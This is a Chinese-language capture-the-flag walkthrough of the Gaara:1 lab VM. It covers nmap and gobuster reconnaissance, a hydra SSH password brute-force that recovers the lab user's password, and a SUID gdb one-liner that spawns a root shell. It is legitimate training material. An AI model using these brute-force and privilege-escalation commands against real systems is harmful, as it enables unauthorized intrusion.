1.靶场获取及环境搭建
靶场地址:因本人的百度网盘内存满了,无法上传靶场,如需靶场的可以在文章末尾添加我的v来获取
环境搭建步骤如下:
1.将下载好的Gaara:1导入VirtualBox
2.将网卡设置成和kali攻击机同一网段即可
攻击机kali:192.168.0.7
靶场ip:192.168.0.3
注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段即可)
2.靶场发现和端口扫描
netdiscover -i eth0 -r 192.168.0.1/24
进行端口扫描
nmap -A -sV -p- 192.168.0.3
扫出来是,一共是开放了两个端口的
nmap -A -sV -p- 192.168.0.3
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-22 16:31 CST
Nmap scan report for 192.168.0.3
Host is up (0.014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 3e:a3:6f:64:03:33:1e:76:f8:e4:98:fe:be:e9:8e:58 (RSA)
| 256 6c:0e:b5:00:e7:42:44:48:65:ef:fe:d7:7c:e6:64:d5 (ECDSA)
|_ 256 b7:51:f2:f9:85:57:66:a8:65:54:2e:05:f9:40:d2:f4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Gaara
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:E7:81:C5 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE
HOP RTT ADDRESS
1 13.89 ms 192.168.0.3OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.32 seconds
先访问下80端口叭,只有这串没啥用的单词
80端口没啥可利用的了,去跑一下目录
gobuster dir -e -u http://192.168.0.3 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
跑出了这个Cryoserver,老规矩访问一下喽,页面访问打开的瞬间是空白,后来琢磨了一下,发现页面是可以滑动的,直接滑到最下面是有三个后缀名的,直接联想到有可以访问了哈哈哈,一个一个的去访问,访问发现第一个和第二个后缀访问出来的是一堆英文翻译过来也是一些没啥有用的信息
第三个后缀访问出来的英文看了好一会之后,发现了一串加密的数据
拿去解密,一下子不知道这个是什么算法的,琢磨了会用base58位解出来了
gaara是一个用户名,我猜测后面这个应该是密码,22端口还是开放着的,拿去连接看看,很显然密码是错误的,无法登陆
知道账户名不知道密码,那就用比较血腥的手段了,密码爆破(工具:hydra)
hydra -l gaara -P rockyou.txt 192.168.0.3 ssh -t 64
这里也已经是爆破出来了,账户:gaara 密码:iloveyou2
得到密码再次使用ssh连接,成功连接进来
查看当下目录的时候,发现了第一个flag,还有一个特殊的文件,特殊文件里面还有一个base64位加密的数据
直接丢弃base64解密
根据这个解码的提示,/usr/local/games目录下是有提示的的,直接切换至其目录下查看,切换到目录下发现了一文件,打开之后发现这是一个典型的brainfuck加密,解密之后没啥信息。
提权:查看用户的suid权限
这里的用户,gdb是可以进行一个提权的作用 ,进入到/usr/bin目录里进行提权
./gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
已经提权成了root权限,我们找一下第二个flag
至此靶场就完成全部的渗透啦!